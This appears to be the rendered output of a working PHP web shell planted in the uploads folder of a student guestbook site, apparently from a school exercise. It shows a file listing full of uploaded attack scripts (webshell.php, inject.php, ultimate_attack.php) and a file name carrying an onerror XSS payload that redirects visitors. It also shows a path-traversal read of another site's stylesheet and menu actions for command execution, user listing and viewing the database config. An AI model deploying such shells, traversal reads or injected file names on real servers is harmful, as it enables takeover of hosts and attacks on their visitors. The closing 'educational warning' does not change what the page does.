🐚 WEB SHELL ACTIVATED

📁 File Browser

Current directory: /home/klas4s23/domains/585455.klas4s23.mid-ica.nl/public_html/Gastenboek/uploads

📄 ' onerror='alert(`Gehacked door Jasper!`);window.location.replace(`..`)'.png [view]
📁 ..
📄 003b15869ae62d2ceeee451a5f652dd6.png [view]
📄 0tk5j14v024b1.jpg [view]
📄 300px-Cursed_Cat.jpg [view]
📄 32640-afbeelding-1__ScaleMaxWidthWzYwMF0_CompressedW10.jpg [view]
📄 Bill-Gates-Paul-Allen-2013.jpg [view]
📄 CV Jasper Kramp.png [view]
📄 Cat profile.png [view]
📄 Fronalpstock_big.jpg [view]
📄 Krik en las.jpg [view]
📄 Krik.jpg [view]
📄 Pino-dood-03.jpg [view]
📄 Shellz.php [view]
📄 Ted_Kaczynski_2_(cropped).jpg [view]
📄 Tux.svg.png [view]
📄 Z.png [view]
📄 android.jpg [view]
📄 apple.php [view]
📄 cianancatfish.jpg [view]
📄 downloads (1).jpeg [view]
📄 downloads.jpeg [view]
📄 epresso.jpg [view]
📄 fake_photo.png [view]
📄 hand.jpg [view]
📄 https___dynaimage.cdn.cnn.com_cnn_x_156,y_210,w_1209,h_1612,c_crop_https2F2F5bae1c384db3d70020c01c40%2FfireflyWolfy.jpg [view]
📄 image.png [view]
📄 images.jpeg [view]
📄 info.php [view]
📄 inject.php [view]
📄 instant_redirect.jpg [view]
📄 japper.jpg [view]
📄 koekiemonster-3.jpg [view]
📄 logo.png [view]
📄 muis.jpg [view]
📄 people-call-woman-ugly-responds-with-more-selfies-melissa-blake-1-5d75f249a418b__700.jpg [view]
📄 picobellobv.jpeg [view]
📄 redirect.php [view]
📄 rupsje-nooitgenoeg-knuffel-pluche-42-cm-500x500.jpg [view]
📄 sdfsa.png [view]
📄 sneaky.svg [view]
📄 taylor.webp [view]
📄 test.html [view]
📄 testpreg.php [view]
📄 testpreg1.php [view]
📄 testtest.php.JPG [view]
📄 ultimate_attack.gif [view]
📄 ultimate_attack.php [view]
📄 ultimate_attack.svg [view]
📄 wallpaper.jpg [view]
📄 webshell.php [view]

📄 Viewing: ../../../../587041.klas4s23.mid-ica.nl/public_html/style.css

*,
*::after,
*::before {
  box-sizing: border-box;
}
/* Hide scrollbar for Chrome, Safari and Opera */
/* Hide scrollbar for Chrome, Safari and Opera */
body::-webkit-scrollbar{
    display: none;
}


body {
  overflow-x: hidden;
  font-family: 'Courier New', Courier, monospace;
  margin: 0;

    background-color: #fff;
    -ms-overflow-style: none; /* IE and Edge */
    scrollbar-width: none; /* Firefox */

}

:root {
  
  --bar-width: 60px;
  --bar-height: 8px;
  --hamburger-gap: 6px;
  --foreground: #481D24;
  --background: #2b2624;
  --hamburger-margin: 8px;
  --animation-timing: 200ms ease-in-out;
  --hamburger-height: calc(var(--bar-height) * 3 + var(--hamburger-gap) * 2);
}

.hamburger-menu {
  
  margin-top: 10px;

  padding-right: 10px !important;
  --x-width: calc(var(--hamburger-height) * 1.41421356237);

  display: flex;
  flex-direction: column;
  gap: var(--hamburger-gap);
  width: max-content;
  position: absolute;
  top: var(--hamburger-margin);
  right: var(--hamburger-margin);
  z-index: 2;
  cursor: pointer;
}

.hamburger-menu:has(input:checked) {
  --foreground:#000000;
  --background: #481D24;

  /* background-color:; */
  /* border */
  /* box-shadow */
}

.hamburger-menu:has(input:focus-visible)::before,
.hamburger-menu:has(input:focus-visible)::after,
.hamburger-menu input:focus-visible {
  border: 1px solid var(--background);
  box-shadow: 0 0 0 1px var(--foreground);
}

.hamburger-menu::before,
.hamburger-menu::after,
.hamburger-menu input {
  background-color: var(--background);

  content: "";
  width: var(--bar-width);
  height: var(--bar-height);
  
  border-radius: 9999px;
  transform-origin: right center;
  transition: opacity var(--animation-timing), width var(--animation-timing),
    rotate var(--animation-timing), translate var(--animation-timing),
    background-color var(--animation-timing);
}

.hamburger-menu input {
  appearance: none;
  padding: 0;
  margin: 0;
  outline: none;
  pointer-events: none;
}

.hamburger-menu:has(input:checked)::before {
  rotate: -45deg;
  width: var(--x-width);
  translate: 0 calc(var(--bar-height) / -2);
}

.hamburger-menu:has(input:checked)::after {
  rotate: 45deg;
  width: var(--x-width);
  translate: 0 calc(var(--bar-height) / 2);
}

.hamburger-menu input:checked {
  opacity: 0;
  width: 0;
}

.sidebar {
 
  background-color:#bfafa6;
  color: #2b2624;
  transition: left var(--animation-timing);
  padding: 0.5rem 1rem;
  padding-top: calc(var(--hamburger-height) + var(--hamburger-margin) + 1rem);
  width: 110vw;
  min-height: 100vh;
  left: 110vw;
  position: absolute;
  top: 0;
}
.li{
  font-size: larger;
}

.hamburger-menu:has(input:checked) + .sidebar {
  left: calc(100vw - 13rem);

}
  /* Define the initial position of the element */
  .slide-in-element {
 /* border: 2px solid #D4AE31; */
    font-size: 50px;
    height: 5vh;
    display: flex;
    align-items: center;
    justify-content: center;
    padding: 0;
    text-align: center;
    animation: slideIn 4s 1;
    z-index:0;
position: relative;
}

/* Define the keyframes for the slide-in animation */
@keyframes slideIn {
  from {
    margin-top: -40vh;
  }
    to {
        margin-top: 23vh/* Slide the element to the left edge of the screen */
    }
}

.mymove {
 font-weight: bold;
  font-size: 25px;
  height: 0vh;
  display: in;
  align-items: center;
  justify-content: center;
  padding: 0;
  text-align: center;
 

  position: relative;
  animation: mymove 4s 1;
  top: 60vh;
}

@keyframes mymove {
  from {top: 100vh;}
  to {top:60vh;}
}

.text{
  color:#1C2321;
}

.sidebar nav ul a {
 text-decoration: none;
font-size: large;
font-weight: 900;
  display: block;
  height: 100%;
  width: 100%;
  line-height: 30px;
  font-size: 20px;
  color: #481D24;
  padding-left: 0px;
  padding-top: 10px;
  transition: 0.4s;
  z-index: 999999999;
}
ul li:hover a {
  padding-left: 25px;
}
.sidebar ul a i {
  margin-right: 0px;
}
body {
  background-color: #f5e4d7;
}
svg {
  position: fixed;
  top: 0;
  left: 0;
  width: 100%;
  height: 100vh;
}
h1 {
  font-weight: bold;
   font-size: 45px;
   height: 0vh;
   display: in;
   align-items: center;
   justify-content: center;
   margin-top: 160px;
   text-align: center;
  
 
   position: relative;
}
@media (min-width: 768px) {
  .hamburger-menu {
    align-items: center !important; /* Add the !important rule to enforce the property */
  }
  .sidebar {
    padding-left: 0 !important;
    margin-left: 0 !important;
    width: 100% !important;
    min-width: 100% !important; /* Add the !important rule to enforce the property */
  }
 
}
/* @media (max-width: 768px) {
   .hamburger-menu:has(input:checked) + .sidebar {
    left: calc(0vw);
  
  }
} */

.sidebar {
  z-index: 99; /* Set the z-index for the sidebar */
  /* Other CSS properties */
}

.hamburger-menu {
  z-index: 99999; /* Set the z-index for the hamburger menu button */
  /* Other CSS properties */
}

/* Ensure the hamburger menu button remains visible even when the sidebar is open */
.hamburger-menu:has(input:checked) + .sidebar {
  z-index: 9999; /* Set the z-index for the open sidebar */
  /* Other CSS properties */
}

🎯 Available Actions

Command Execution:

Quick Commands:

📋 List files | 👤 Show user | 📍 Show directory | 🔄 Show processes | 🔐 Show users

File Operations:

⬆️ Parent directory | 🏠 Root directory | 🔍 View DB config
⚠️ Educational Warning: This demonstrates a web shell vulnerability. In a real attack, this could allow complete server compromise!